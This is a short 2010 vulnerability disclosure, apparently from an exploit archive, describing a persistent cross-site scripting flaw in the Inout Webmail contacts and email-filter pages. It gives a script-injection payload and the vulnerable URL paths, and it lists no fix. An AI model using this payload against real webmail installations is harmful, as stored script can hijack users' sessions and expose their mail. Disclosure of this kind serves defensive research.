32 lines
No EOL
1.6 KiB
Text
32 lines
No EOL
1.6 KiB
Text
#Name :inoutwebmail Persistent Xss Vulnerability
|
|
#Date : Dec,20 2010
|
|
#Vendor Url :http://www.inoutscripts.com/
|
|
#Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
|
#Big hugs : Th3 RDX,Hanan_butt,
|
|
#special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,SeeMe,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,tranquiller,Sug@R
|
|
#greetz to :!Op3x_ninjato team,www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz
|
|
#######################################################################################################
|
|
Description:
|
|
Inout Webmail is a complete webmail solution for your website. Build your own personal secure mail service today
|
|
|
|
###############################################################################################################
|
|
Exploit:Persistent Xss Vulnerability
|
|
|
|
The vulnerability exists due to failure in the script to properly sanitize user-supplied input.Successful exploitation of this vulnerability could result in a compromise of the application,disclosure or modification of sensitive data.
|
|
|
|
|
|
>The Xss vulnerability exists in "contacts",emailfilter
|
|
>Also the attacker can send malicious xss scripts to the users who are using this application
|
|
|
|
Attack parameter: "><script>alert("xss")</script>
|
|
|
|
>http://server/path/index.php?page=mail/mailbox
|
|
>http://server/index.php?page=settings/emailfilter
|
|
|
|
###############################################################################################################
|
|
Fix:
|
|
N/a
|
|
###############################################################################################################
|
|
# 0day no more
|
|
# Sid3^effects
|
|
# 1337day.com |